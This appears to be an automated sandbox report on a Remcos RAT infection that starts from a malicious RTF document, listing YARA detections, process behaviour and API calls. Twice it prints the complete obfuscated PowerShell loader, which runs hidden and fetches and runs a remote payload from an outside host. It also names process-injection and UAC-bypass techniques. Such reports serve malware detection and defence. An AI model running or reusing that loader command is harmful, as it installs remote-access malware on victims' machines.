                  Source: Yara matchFile source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3036, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CA73 SystemParametersInfoW,14_2_0041CA73

                  System Summary

                  barindex
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 3036, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4471D5D4.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\S7UYq0.urlJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\uc on 91.134.96.177.urlJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_0041812A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,14_2_0041330D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,14_2_0041BBC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,14_2_0041BB9A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,14_2_004167EF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005CEE928_2_005CEE92
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005D1F928_2_005D1F92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043706A14_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041400514_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E11C14_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004541D914_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004381E814_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041F18B14_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044627014_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E34B14_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004533AB14_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042742E14_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043756614_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E5A814_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004387F014_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043797E14_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004339D714_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044DA4914_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427AD714_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041DBF314_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427C4014_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00437DB314_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00435EEB14_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043DEED14_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00426E9F14_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1001719414_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1000B5C114_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B04015_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043610D15_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044731015_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044A49015_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040755A15_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043C56015_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B61015_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044D6C015_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004476F015_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B87015_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044081D15_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041495715_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004079EE15_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407AEB15_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044AA8015_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00412AA915_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B7415_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B0315_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044BBD815_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404BE515_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404C7615_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00415CFE15_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416D7215_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D3015_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D8B15_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00406E8F15_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040503816_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041208C16_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004050A916_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040511A16_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043C13A16_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004051AB16_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044930016_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040D32216_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A4F016_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041363116_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044669016_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A73016_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004398D816_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004498E016_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A88616_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043DA0916_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00438D5E16_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00449ED016_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041FE8316_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00430F5416_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004050C218_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004014AB18_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040513318_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004051A418_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040124618_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040CA4618_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040523518_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004032C818_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040168918_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402F6018_2_00402F60
                  Source: ~WRF{29D0D8AE-3680-4F24-B6B5-4CF617677437}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
